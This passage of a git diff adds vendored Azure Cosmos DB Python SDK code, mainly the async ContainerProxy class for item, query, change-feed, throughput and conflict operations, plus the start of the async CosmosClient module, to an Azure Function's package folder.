CosmosResourceNotFoundError +from ..http_constants import StatusCodes +from ..offer import ThroughputProperties +from ._scripts import ScriptsProxy +from ..partition_key import NonePartitionKeyValue + +__all__ = ("ContainerProxy",) + + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +class ContainerProxy(object): + """An interface to interact with a specific DB Container. + + This class should not be instantiated directly. Instead, use the + :func:`~azure.cosmos.aio.database.DatabaseProxy.get_container_client` method to get an existing + container, or the :func:`~azure.cosmos.aio.database.DatabaseProxy.create_container` method to create a + new container. + + A container in an Azure Cosmos DB SQL API database is a collection of + documents, each of which is represented as an Item. + + :ivar str id: ID (name) of the container + :ivar str session_token: The session token for the container. 
+ """ + + def __init__( + self, + client_connection: CosmosClientConnection, + database_link: str, + id: str, # pylint: disable=redefined-builtin + properties: Dict[str, Any] = None + ) -> None: + self.client_connection = client_connection + self.id = id + self._properties = properties + self.database_link = database_link + self.container_link = u"{}/colls/{}".format(database_link, self.id) + self._is_system_key = None + self._scripts: Optional[ScriptsProxy] = None + + def __repr__(self) -> str: + return "".format(self.container_link)[:1024] + + async def _get_properties(self) -> Dict[str, Any]: + if self._properties is None: + self._properties = await self.read() + return self._properties + + @property + async def is_system_key(self) -> bool: + if self._is_system_key is None: + properties = await self._get_properties() + self._is_system_key = ( + properties["partitionKey"]["systemKey"] if "systemKey" in properties["partitionKey"] else False + ) + return cast('bool', self._is_system_key) + + @property + def scripts(self) -> ScriptsProxy: + if self._scripts is None: + self._scripts = ScriptsProxy(self, self.client_connection, self.container_link) + return cast('ScriptsProxy', self._scripts) + + def _get_document_link(self, item_or_link: Union[Dict[str, Any], str]) -> str: + if isinstance(item_or_link, str): + return u"{}/docs/{}".format(self.container_link, item_or_link) + return item_or_link["_self"] + + def _get_conflict_link(self, conflict_or_link: Union[Dict[str, Any], str]) -> str: + if isinstance(conflict_or_link, str): + return u"{}/conflicts/{}".format(self.container_link, conflict_or_link) + return conflict_or_link["_self"] + + def _set_partition_key(self, partition_key) -> Union[str, Awaitable]: + if partition_key == NonePartitionKeyValue: + return CosmosClientConnection._return_undefined_or_empty_partition_key(self.is_system_key) + return partition_key + + + @distributed_trace_async + async def read( + self, + **kwargs: Any + ) -> Dict[str, Any]: + """Read the container properties. + + :keyword bool populate_partition_key_range_statistics: Enable returning partition key + range statistics in response headers. + :keyword bool populate_quota_info: Enable returning collection storage quota information in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be retrieved. + This includes if the container does not exist. + :returns: Dict representing the retrieved container. 
+ :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + populate_partition_key_range_statistics = kwargs.pop('populate_partition_key_range_statistics', None) + if populate_partition_key_range_statistics is not None: + request_options["populatePartitionKeyRangeStatistics"] = populate_partition_key_range_statistics + populate_quota_info = kwargs.pop('populate_quota_info', None) + if populate_quota_info is not None: + request_options["populateQuotaInfo"] = populate_quota_info + + collection_link = self.container_link + self._properties = await self.client_connection.ReadContainer( + collection_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace_async + async def create_item( + self, + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Create an item in the container. + + To update or replace an existing item, use the + :func:`ContainerProxy.upsert_item` method. + + :param dict[str, str] body: A dict-like object representing the item to create. + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword indexing_directive: Enumerates the possible values to indicate whether the document should + be omitted from indexing. Possible values include: 0 for Default, 1 for Exclude, or 2 for Include. + :paramtype indexing_directive: Union[int, ~azure.cosmos.documents.IndexingDirective] + :keyword bool enable_automatic_id_generation: Enable automatic id generation if no id present. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Item with the given ID already exists. + :returns: A dict representing the new item. 
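# Usage sketch for create_item as documented above; the body is placeholder data.
# Cosmos requires an "id" on the item unless enable_automatic_id_generation is set.
async def add_order(container):
    return await container.create_item(
        {"id": "order-1", "customer": "c42", "total": 18.5},
        enable_automatic_id_generation=False,
    )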
+ :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + post_trigger_include = kwargs.pop('post_trigger_include', None) + indexing_directive = kwargs.pop('indexing_directive', None) + + request_options["disableAutomaticIdGeneration"] = not kwargs.pop('enable_automatic_id_generation', False) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + if indexing_directive is not None: + request_options["indexingDirective"] = indexing_directive + + result = await self.client_connection.CreateItem( + database_or_container_link=self.container_link, document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def read_item( + self, + item: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any + ) -> Dict[str, Any]: + """Get the item identified by `item`. + + :param item: The ID (name) or dict representing item to retrieve. + :type item: Union[str, Dict[str, Any]] + :param partition_key: Partition key for the item to retrieve. + :type partition_key: Union[str, int, float, bool] + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: The max cache staleness for the integrated cache in + milliseconds. For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item couldn't be retrieved. + :returns: Dict representing the item to be retrieved. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. 
literalinclude:: ../samples/examples_async.py + :start-after: [START update_item] + :end-before: [END update_item] + :language: python + :dedent: 0 + :caption: Get an item from the database and update one of its properties: + :name: update_item + """ + doc_link = self._get_document_link(item) + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms is not None: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + request_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + result = await self.client_connection.ReadItem(document_link=doc_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def read_all_items( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List all the items in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: The max cache staleness for the integrated cache in + milliseconds. For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An AsyncItemPaged of items (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + if hasattr(response_hook, "clear"): + response_hook.clear() + + items = self.client_connection.ReadItems( + collection_link=self.container_link, feed_options=feed_options, response_hook=response_hook, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, items) + return items + + @distributed_trace + def query_items( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all results matching the given `query`. + + You can use any value for the container name in the FROM clause, but + often the container name is used. In the examples below, the container + name is "products," and is aliased as "p" for easier referencing in + the WHERE clause. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. 
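# Sketch of a point read with read_item above: both the item id and its partition
# key value are required. The partition key path (/customer here) is an assumption
# about how the container was created.
async def get_order(container, order_id: str, customer_id: str):
    return await container.read_item(item=order_id, partition_key=customer_id)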
+ :keyword parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword partition_key: Specifies the partition key value for the item. If none is provided, + a cross-partition query will be executed. + :paramtype partition_key: Union[str, int, float, bool] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword bool enable_scan_in_query: Allow scan on the queries which couldn't be served as + indexing was opted out on the requested paths. + :keyword bool populate_query_metrics: Enable returning query metrics in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: The max cache staleness for the integrated cache in + milliseconds. For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An AsyncItemPaged of items (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START query_items] + :end-before: [END query_items] + :language: python + :dedent: 0 + :caption: Get all products that have not been discontinued: + :name: query_items + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START query_items_param] + :end-before: [END query_items_param] + :language: python + :dedent: 0 + :caption: Parameterized query to get all products that have been discontinued: + :name: query_items_param + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + populate_query_metrics = kwargs.pop('populate_query_metrics', None) + if populate_query_metrics is not None: + feed_options["populateQueryMetrics"] = populate_query_metrics + enable_scan_in_query = kwargs.pop('enable_scan_in_query', None) + if enable_scan_in_query is not None: + feed_options["enableScanInQuery"] = enable_scan_in_query + partition_key = kwargs.pop('partition_key', None) + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + else: + feed_options["enableCrossPartitionQuery"] = True + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + if hasattr(response_hook, "clear"): + response_hook.clear() + + parameters = kwargs.pop('parameters', None) + items = self.client_connection.QueryItems( + database_or_container_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + partition_key=partition_key, + response_hook=response_hook, + **kwargs + ) + if response_hook: + 
response_hook(self.client_connection.last_response_headers, items) + return items + + @distributed_trace + def query_items_change_feed( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Get a sorted list of items that were changed, in the order in which they were modified. + + :keyword bool is_start_from_beginning: Get whether change feed should start from + beginning (true) or from current (false). By default it's start from current (false). + :keyword str partition_key_range_id: ChangeFeed requests can be executed against specific partition key + ranges. This is used to process the change feed in parallel across multiple consumers. + :keyword str continuation: e_tag value to be used as continuation for reading change feed. + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword partition_key: partition key at which ChangeFeed requests are targeted. + :paramtype partition_key: Union[str, int, float, bool] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of items (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + partition_key = kwargs.pop("partition_key", None) + partition_key_range_id = kwargs.pop("partition_key_range_id", None) + is_start_from_beginning = kwargs.pop("is_start_from_beginning", False) + feed_options["isStartFromBeginning"] = is_start_from_beginning + if partition_key_range_id is not None: + feed_options["partitionKeyRangeId"] = partition_key_range_id + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + continuation = kwargs.pop('continuation', None) + if continuation is not None: + feed_options["continuation"] = continuation + + if hasattr(response_hook, "clear"): + response_hook.clear() + + result = self.client_connection.QueryItemsChangeFeed( + self.container_link, options=feed_options, response_hook=response_hook, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def upsert_item( + self, + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Insert or update the specified item. + + If the item already exists in the container, it is replaced. If the item + does not already exist, it is inserted. + + :param Dict[str, Any] body: A dict-like object representing the item to update or insert. + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. 
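# Sketch of query_items per the docstring above: parameters follow the @name
# convention, and passing partition_key keeps the query single-partition (omitting
# it triggers a cross-partition query). The container alias and property names are
# placeholders.
async def discontinued_products(container, category: str):
    results = container.query_items(
        "SELECT * FROM products p WHERE p.discontinued = @flag",
        parameters=[{"name": "@flag", "value": True}],
        partition_key=category,
    )
    async for item in results:
        print(item["id"])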
+ :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item could not be upserted. + :returns: A dict representing the upserted item. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = await self.client_connection.UpsertItem( + database_or_container_link=self.container_link, + document=body, + options=request_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def replace_item( + self, + item: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replaces the specified item if it exists in the container. + + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be replaced. + :type item: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the item to replace. + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The replace failed or the item with + given id does not exist. + :returns: A dict representing the item after replace went through. + :rtype: Dict[str, Any] + """ + item_link = self._get_document_link(item) + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = await self.client_connection.ReplaceItem( + document_link=item_link, new_document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def delete_item( + self, + item: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any + ) -> None: + """Delete the specified item from the container. 
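# Sketch of optimistic concurrency with replace_item via the etag / match_condition
# keywords documented above. MatchConditions comes from azure.core; "_etag" is the
# system property Cosmos stores on every item. A concurrent update makes the call
# fail with a 412 (CosmosAccessConditionFailedError).
from azure.core import MatchConditions

async def rename_item(container, item: dict, new_name: str):
    item["name"] = new_name
    return await container.replace_item(
        item,
        body=item,
        etag=item["_etag"],
        match_condition=MatchConditions.IfNotModified,
    )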
+ + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be deleted. + :type item: Union[str, Dict[str, Any]] + :param partition_key: Specifies the partition key value for the item. + :type partition_key: Union[str, int, float, bool] + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The item wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The item does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + document_link = self._get_document_link(item) + result = await self.client_connection.DeleteItem(document_link=document_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + @distributed_trace_async + async def get_throughput(self, **kwargs: Any) -> ThroughputProperties: + """Get the ThroughputProperties object for this container. + + If no ThroughputProperties already exists for the container, an exception is raised. + + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], List[Dict[str, Any]]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container + or the throughput properties could not be retrieved. + :returns: ThroughputProperties for the container. 
+ :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find ThroughputProperties for container " + self.container_link) + + if response_hook: + response_hook(self.client_connection.last_response_headers, throughput_properties) + + return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"], + properties=throughput_properties[0]) + + @distributed_trace_async + async def replace_throughput(self, throughput: int, **kwargs: Any) -> ThroughputProperties: + """Replace the container's throughput. + + If no ThroughputProperties already exist for the container, an exception is raised. + + :param int throughput: The throughput to be set (an integer). + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container + or the throughput properties could not be updated. + :returns: ThroughputProperties for the container, updated with new throughput. + :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find Offer for container " + self.container_link) + + new_offer = throughput_properties[0].copy() + new_offer["content"]["offerThroughput"] = throughput + data = await self.client_connection.ReplaceOffer(offer_link=throughput_properties[0]["_self"], + offer=throughput_properties[0], **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data) + + @distributed_trace + def list_conflicts(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]: + """List all the conflicts in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of conflicts (dicts). 
+ :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadConflicts( + collection_link=self.container_link, feed_options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_conflicts( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all conflicts matching a given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword partition_key: Specifies the partition key value for the item. If none is passed in, a + cross partition query will be executed. + :paramtype partition_key: Union[str, int, float, bool] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of conflicts (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + partition_key = kwargs.pop("partition_key", None) + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + else: + feed_options["enableCrossPartitionQuery"] = True + + parameters = kwargs.pop('parameters', None) + result = self.client_connection.QueryConflicts( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def get_conflict( + self, + conflict: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any, + ) -> Dict[str, Any]: + """Get the conflict identified by `conflict`. + + :param conflict: The ID (name) or dict representing the conflict to retrieve. + :type conflict: Union[str, Dict[str, Any]] + :param partition_key: Partition key for the conflict to retrieve. + :type partition_key: Union[str, int, float, bool] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given conflict couldn't be retrieved. + :returns: A dict representing the retrieved conflict. 
+ :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + result = await self.client_connection.ReadConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def delete_conflict( + self, + conflict: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any, + ) -> None: + """Delete a specified conflict from the container. + + If the conflict does not already exist in the container, an exception is raised. + + :param conflict: The ID (name) or dict representing the conflict to retrieve. + :type conflict: Union[str, Dict[str, Any]] + :param partition_key: Partition key for the conflict to retrieve. + :type partition_key: Union[str, int, float, bool] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The conflict wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The conflict does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + result = await self.client_connection.DeleteConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client.py new file mode 100644 index 0000000..28f65ab --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client.py @@ -0,0 +1,396 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, and delete databases in the Azure Cosmos DB SQL API service. 
+""" + +from typing import Any, Dict, Optional, Union, cast +from azure.core.async_paging import AsyncItemPaged +from azure.core.credentials import TokenCredential + +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ..cosmos_client import _parse_connection_str, _build_auth +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options as _build_options +from ._retry_utility_async import _ConnectionRetryPolicy +from ._database import DatabaseProxy +from ..documents import ConnectionPolicy, DatabaseAccount +from ..exceptions import CosmosResourceNotFoundError + +__all__ = ("CosmosClient",) + + +def _build_connection_policy(kwargs: Dict[str, Any]) -> ConnectionPolicy: + # pylint: disable=protected-access + policy = kwargs.pop('connection_policy', None) or ConnectionPolicy() + + # Connection config + policy.RequestTimeout = kwargs.pop('request_timeout', None) or \ + kwargs.pop('connection_timeout', None) or \ + policy.RequestTimeout + policy.ConnectionMode = kwargs.pop('connection_mode', None) or policy.ConnectionMode + policy.ProxyConfiguration = kwargs.pop('proxy_config', None) or policy.ProxyConfiguration + policy.EnableEndpointDiscovery = kwargs.pop('enable_endpoint_discovery', None) or policy.EnableEndpointDiscovery + policy.PreferredLocations = kwargs.pop('preferred_locations', None) or policy.PreferredLocations + policy.UseMultipleWriteLocations = kwargs.pop('multiple_write_locations', None) or \ + policy.UseMultipleWriteLocations + + # SSL config + verify = kwargs.pop('connection_verify', None) + policy.DisableSSLVerification = not bool(verify if verify is not None else True) + ssl = kwargs.pop('ssl_config', None) or policy.SSLConfiguration + if ssl: + ssl.SSLCertFile = kwargs.pop('connection_cert', None) or ssl.SSLCertFile + ssl.SSLCaCerts = verify or ssl.SSLCaCerts + policy.SSLConfiguration = ssl + + # Retry config + retry_options = policy.RetryOptions + total_retries = kwargs.pop('retry_total', None) + retry_options._max_retry_attempt_count = total_retries or retry_options._max_retry_attempt_count + retry_options._fixed_retry_interval_in_milliseconds = kwargs.pop('retry_fixed_interval', None) or 